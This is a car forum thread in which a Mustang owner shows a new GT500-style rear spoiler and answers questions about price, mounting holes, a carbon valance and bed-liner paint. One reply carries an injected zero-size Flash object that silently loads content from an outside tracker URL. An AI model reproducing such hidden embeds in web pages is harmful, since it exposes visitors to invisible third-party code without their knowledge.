New rear spoiler install.

Casey4s

Sep 1, 2007
Woodbridge, VA
I removed the stock type rear spoiler and installed a Shelby GT500 style spoiler in it's place this past weekend and I think it looks a lot better.

Opinions?

Old Spoiler
July009.jpg

New spoiler...
Spoil007.jpg

Spoil008.jpg

Spoil009.jpg

• Sponsors (?)

+1 on that GT500.

What sort of rear bumper is that? The diffuser part looks almost added on and 3d like. I thought the GT/CS or GT500 bumpers were more smooth then that. Is that some sort of valence you added on? or is it the paintjob (looks like rhino liner)

+1 on that GT500.

What sort of rear bumper is that? The diffuser part looks almost added on and 3d like. I thought the GT/CS or GT500 bumpers were more smooth then that. Is that some sort of valence you added on? or is it the paintjob (looks like rhino liner)

The bumper is stock with a 3D carbon Valance.

I am not sure what the diffuser is that you mentioned.

Were did you get it at....... did you go through the spoiler guy on ebay... 120 painted ..please say yes LOL .... either way MUCH BETTER !<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Yeah, looks great. Where did you buy the spoiler and how much did you pay? Was it painted? Thanks!!!!

I have been wanting one of these.....

I got this on ebay from this guy, http://cgi.ebay.com/ebaymotors/PAIN...ptZMotorsQ5fCarQ5fTruckQ5fPartsQ5fAccessories

It is the same vendor as "Spoiler Express" on the Internet at Spoiler Express :: OnLine Store

But for whatever reason you save about $35 buying from ebay.

It re-uses two of the stock holes and covers the other two. You do, however, need to drill an additional two holes to mount this one. It also uses the 3M two sided tape.

EDIT:

This was $90 pre-painted plus $25 shipping. Good color match too.

The bumper is stock with a 3D carbon Valance.

I am not sure what the diffuser is that you mentioned.

The diffuser he's talking about is the black part on the lower part of your rear bumper. It looks just like the Ford GT500 or GT/CS rear valence. So you're saying that it's a 3D Carbon piece?

Edit: I just looked on Mr body kit.com, and I see the 3D Carbon valence that you have. It looks pretty nice, and at $199 the price is pretty good too. I'm kind of leery of it only applying with double-sided tape. How long have you had yours and have you had any issues with it? Also, did you paint it that black color or is that how it came?

I've been planning on doing the same thing with my car, (CS rear bumper with CDC classic chin spoiler). I'd like to leave both the chin spoiler and rear valence that flat black color that you have.

Ok, stupid me I have never heard it called a diffuser, my bad.

It comes in an unpainted plastic of some sort and is kind of a beige color. There are screws in the wheel well and a couple under the car attaching the valance to the original stock skirt.

I painted my CDC aggressive front spoiler and that valance with a stone chip resistant black paint that is easy to touch up. Originally my front spoiler was painted to match the car color but it got easily chipped from highway gravel/stones so I pulled it off and used that black paint. It works for me because all of my exterior trim is black now, all the chrome accents are gone.

It comes in an unpainted plastic of some sort and is kind of a beige color. There are screws in the wheel well and a couple under the car attaching the valance to the original stock skirt.

I painted my CDC aggressive front spoiler and that valance with a stone chip resistant black paint that is easy to touch up. Originally my front spoiler was painted to match the car color but it got easily chipped from highway gravel/stones so I pulled it off and used that black paint. It works for me because all of my exterior trim is black now, all the chrome accents are gone.

Yeah, I'm not sure why some companies call it a "diffuser". I don't know what it diffuses; airflow I guess.

Anyway, what was the paint that you used, if you don't mind me asking?

I use Duplicolor Truck Bed Liner in the spray can. Great paint and pretty tough stuff. Some of the other brands of bed liner in a spray can have sandy grit in them so beware.

There are a couple of pics of the front spoiler in the "Chin Spoiler" thread in the 05 Tech forum BTW.

Very cool. I had seen the 3D carbon piece before, but thought it was the whole rear bumper. It looks much better painted in the duplicolor bed liner paint. I like it, especially with all the lower panels painted the same. Do you have pics of your car from the side, so we can see the whole effect together?

I think that looks great, thanks for posting the additional pics. It really comes together with the shaker and the tail panel. Are those the V6 side skirts?

LOL... yup they sure are, I was going to paint mine with the same paint but I found these on eBay really cheap so it was easier to just change em out. If you know a Torch Red 6cyl owner who wants to change to the GT type, let me know and I'll make him a good deal.

I also removed the Chrome grille pony and repleced it with a black chrome one and painted the GT emblems on the front fenders. I have pretty well removed all the chrome from the outside of my car maknig it stricly a RED & BLACK color scheme.

WOW! Yet another 100x's better looking!
Those wholes you talked about drilling...are those towards the ends of the spoiler? Mine has the additional holes and I'm thinking of taking the spoiler off and drilling them to pull the ends back down...the 3m tape alone can't keep them down.

WOW! Yet another 100x's better looking!
Those wholes you talked about drilling...are those towards the ends of the spoiler? Mine has the additional holes and I'm thinking of taking the spoiler off and drilling them to pull the ends back down...the 3m tape alone can't keep them down.

Yeah, they are near the edge of the trunk lid. I think they are neccessary to hold it on properly.

i was about to place an order for one of these spoilers. going to bite the bullet, but i saw and advertisement for a spoiler that caught my eye. then i enquired about it, and i was pointed in the direction of another one, which completely took my vote for the best spoiler for these cars. trying to be one of the first people to have one. haha.